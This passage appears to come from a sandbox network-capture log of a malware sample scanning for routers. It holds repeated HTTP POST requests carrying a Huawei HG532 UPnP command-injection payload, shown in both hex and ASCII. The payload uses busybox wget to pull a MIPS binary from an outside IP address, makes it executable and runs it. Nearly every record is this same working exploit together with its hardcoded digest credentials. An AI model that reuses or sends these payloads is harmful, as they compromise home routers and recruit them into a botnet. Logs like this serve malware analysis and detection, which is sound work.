35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            79192.168.2.135676841.92.127.12937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.939522982 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            80192.168.2.1349626197.53.161.22937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.940258026 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            81192.168.2.1333514156.78.13.16137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.941005945 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            82192.168.2.1341282156.97.36.3437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.941715002 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            83192.168.2.1355606197.142.203.1737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.942478895 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            84192.168.2.133409241.30.124.17837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.943219900 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            85192.168.2.1360614156.10.20.11737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.943965912 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            86192.168.2.1346644156.79.10.6437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.944688082 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            87192.168.2.1353768156.31.27.23237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.945411921 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            88192.168.2.1333492197.125.224.19137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.946134090 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            89192.168.2.1353482156.82.1.21337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.946835995 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
